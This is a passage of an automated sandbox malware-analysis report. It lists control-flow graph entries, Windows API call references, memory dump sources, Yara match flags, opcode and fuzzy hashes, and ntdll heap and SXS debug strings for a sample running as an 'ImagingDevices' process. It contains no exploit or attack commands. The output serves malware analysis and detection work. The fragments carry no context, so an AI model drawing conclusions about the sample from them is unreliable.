                                                                                                  control_flow_graph 91 87f9f0-87fa05 LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 92 87fae8-87fafd LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 93 87fb68-87fb7d LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 94 87fdc0-87fdd5 LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fd4c66594d0b0bf39a475210e310c1fb272bb8bcf6e4a62b257e39d8d39b8d2b
                                                                                                  • Instruction ID: 23e73a834570aecd08460a8b7e4f4b838cd4d8d1d093b2a758330bc817fd2144
                                                                                                  • Opcode Fuzzy Hash: fd4c66594d0b0bf39a475210e310c1fb272bb8bcf6e4a62b257e39d8d39b8d2b
                                                                                                  • Instruction Fuzzy Hash: A0F1A1B0D00219AFDB24DF55CC81AEEB7B8AF44304F1481AFE515A7341DB78AA85CF99

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(2-4C93H,00000111,00000000,00000000), ref: 004141CA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 2-4C93H$2-4C93H
                                                                                                  • API String ID: 1836367815-2145140999
                                                                                                  • Opcode ID: 0f860e54958a788d109e95205eb8c421ec4e45f0df9d19f714ae64d8604edf5a
                                                                                                  • Instruction ID: fbceb0e1d869972590f9eab5db8387fc513db08b05393990d17a75f8aa77820b
                                                                                                  • Opcode Fuzzy Hash: 0f860e54958a788d109e95205eb8c421ec4e45f0df9d19f714ae64d8604edf5a
                                                                                                  • Instruction Fuzzy Hash: 8F215E72D01248BBC7119BA59C82CEFBB7CEF81354F40846EF91467201D7785E028BA4

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(2-4C93H,00000111,00000000,00000000), ref: 004141CA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 2-4C93H$2-4C93H
                                                                                                  • API String ID: 1836367815-2145140999
                                                                                                  • Opcode ID: ff30eac129e63dd3bfb3ec804e9d87b30dc75ff0e1fd2fb88da7ed881d8e40f8
                                                                                                  • Instruction ID: 11fdab42c02f6534fa46d3ae9712a4795323e9382ac4f9be012f285653c565a5
                                                                                                  • Opcode Fuzzy Hash: ff30eac129e63dd3bfb3ec804e9d87b30dc75ff0e1fd2fb88da7ed881d8e40f8
                                                                                                  • Instruction Fuzzy Hash: C701E5B1D0015C7AEB019AD69C81DEF7B7CDF81398F40846AF904A7101D67C4E0687A5

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(2-4C93H,00000111,00000000,00000000), ref: 004141CA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 2-4C93H$2-4C93H
                                                                                                  • API String ID: 1836367815-2145140999
                                                                                                  • Opcode ID: 048a6b87aa7270504312d33b1c3c258aa7b1a11dc077cc88d4becbb04c59c438
                                                                                                  • Instruction ID: c65e53d4b7a7b16466f25411da96260320759b269483fd5d9de3e4652ac109b9
                                                                                                  • Opcode Fuzzy Hash: 048a6b87aa7270504312d33b1c3c258aa7b1a11dc077cc88d4becbb04c59c438
                                                                                                  • Instruction Fuzzy Hash: AD01C8B1D0011C7AEB11AAE69C81DEF7B7CDF41798F44846AF904B7141D6784E0647A5

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 76 42c8e3-42c924 call 4048f3 call 42d7b3 RtlFreeHeap
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4C656368,00000007,00000000,00000004,00000000,00417134,000000F4), ref: 0042C91F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: 2c56882d6ba8bf578448de90a9cf5da59bfc6358362457d765d989ff5e34f9b3
                                                                                                  • Instruction ID: 4e8b5b9603979593779fe1f7de2829673016f207650668264653408cb2314b32
                                                                                                  • Opcode Fuzzy Hash: 2c56882d6ba8bf578448de90a9cf5da59bfc6358362457d765d989ff5e34f9b3
                                                                                                  • Instruction Fuzzy Hash: 67E0ED762002087BD600EE59DC41F9B33ACEFC4310F004019FA08A3281C672B9108BB8

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 71 42c893-42c8d7 call 4048f3 call 42d7b3 RtlAllocateHeap
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(?,0041E5E4,?,?,00000000,?,0041E5E4,?,?,?), ref: 0042C8D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 47c6b43b7f29c263505c8cd0a882858649bcc6264c1d12a1f1b9b5e57d3eff1f
                                                                                                  • Instruction ID: e6e8b3794537dfb8c58b3de8acc9f1789de01d5ae22b52d1ee9829aa63cf0a32
                                                                                                  • Opcode Fuzzy Hash: 47c6b43b7f29c263505c8cd0a882858649bcc6264c1d12a1f1b9b5e57d3eff1f
                                                                                                  • Instruction Fuzzy Hash: 76E06DB6244305BBD610EE59DC45FAB33ACEFC4714F004419FA08A7242D675B9108BB4

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 86 42c933-42c96c call 4048f3 call 42d7b3 ExitProcess
                                                                                                  APIs
                                                                                                  • ExitProcess.KERNELBASE(?,00000000,00000000,?,A8229226,?,?,A8229226), ref: 0042C967
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: 83978265a4cde1ac062ccd79c9e728656fa41f54897689da2430693d0be3a923
                                                                                                  • Instruction ID: 136aaa4377b992c0ce37a936d61beba38d9e12674d03e1623fc729aa0e31b1b5
                                                                                                  • Opcode Fuzzy Hash: 83978265a4cde1ac062ccd79c9e728656fa41f54897689da2430693d0be3a923
                                                                                                  • Instruction Fuzzy Hash: C7E0463A200214BBC220BA5AEC41FDBB76CDFC5728F00442AFA08A7281CA75B91586F4
                                                                                                  Strings
                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 008E53FD
                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 008E5550
                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 008E551A
                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 008E5496
                                                                                                  • @, xrefs: 008C22A5
                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 008E5586
                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 008E545F
                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 008E54E7
                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 008E5566
                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 008E5386
                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 008E5581
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                  • API String ID: 0-4009184096
                                                                                                  • Opcode ID: 92cff56be65991e67d806125378bac87a0c81c62095140d6551b761a85fdfffe
                                                                                                  • Instruction ID: 0557fcbff84863ca55638658c0e9caec8db4dc7d753a1b92f923910cafa145f6
                                                                                                  • Opcode Fuzzy Hash: 92cff56be65991e67d806125378bac87a0c81c62095140d6551b761a85fdfffe
                                                                                                  • Instruction Fuzzy Hash: 31022CF2D006689FDB20DF54CC80A9AB7B8FF55308F4441EAE609E7252E6349E84CF59
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: None%s$%08I64X: PC32 %08X -> %08X (target %p) %s$%08I64X: Unknown$%08I64X: VA32 %08X -> %08X %s$%08I64X: VA64 %016I64X -> %016I64X %s$ (padding)$(no change)$0(]$Invalid fixup information
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0(]$8(]$DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$MZER$Status: 0x%08lx$d:\w7rtm\minkernel\ntdll\ldrfind.c$,]
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                                                                                                  Strings
                                                                                                  • sxsisol_SearchActCtxForDllName, xrefs: 008E3BCE
                                                                                                  • @, xrefs: 0088F3FE
                                                                                                  • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 008E3BDF
                                                                                                  • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 008E3D74
                                                                                                  • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 008E3C08
                                                                                                  • Status != STATUS_NOT_FOUND, xrefs: 008E3D6A
                                                                                                  • Internal error check failed, xrefs: 008E3D79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ^$gfff$gfff$gfff$i$E
                                                                                                  Strings
                                                                                                  • HEAP: , xrefs: 008DDAB3, 008DDB9B
                                                                                                  • HEAP[%wZ]: , xrefs: 008DDAA6, 008DDB8E
                                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 008DDABE
                                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 008DDBA6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                  Strings
                                                                                                  • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 008EA4AC
                                                                                                  • HEAP: , xrefs: 008EA498
                                                                                                  • HEAP[%wZ]: , xrefs: 008EA48B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                  • API String ID: 0-2419525547
                                                                                                  • Opcode ID: 38818294bbae973a58de991f0c964096f520c9fe04ed03dc606808712abdfb58
                                                                                                  • Instruction ID: d58d957d8b75e70e6a4b7e3d6a6e14504d59dd7803af346e2b0c132c695acdca
                                                                                                  • Opcode Fuzzy Hash: 38818294bbae973a58de991f0c964096f520c9fe04ed03dc606808712abdfb58
                                                                                                  • Instruction Fuzzy Hash: 11C2DBB0600256DFCB18CF19C494ABA7BB2FF95704B2982A9EC96CB355D730ED41DB90
                                                                                                  Strings
                                                                                                  • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 008EACD9
                                                                                                  • HEAP: , xrefs: 008EACC2
                                                                                                  • HEAP[%wZ]: , xrefs: 008EACB5
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                  • API String ID: 0-2419525547
                                                                                                  • Opcode ID: b36978d232261a1ec9b060a134a60b97b25a5a918b450ed8ccefd646cc5fb115
                                                                                                  • Instruction ID: d53991855dbfea78b568517926876e7153182fb92e096b097be0cd518f866034
                                                                                                  • Opcode Fuzzy Hash: b36978d232261a1ec9b060a134a60b97b25a5a918b450ed8ccefd646cc5fb115
                                                                                                  • Instruction Fuzzy Hash: 22A2BE70A04259CFDF29DF69C480BA9BBB1FF45304F28819AE886DB355D730AD81DB51
                                                                                                  Strings
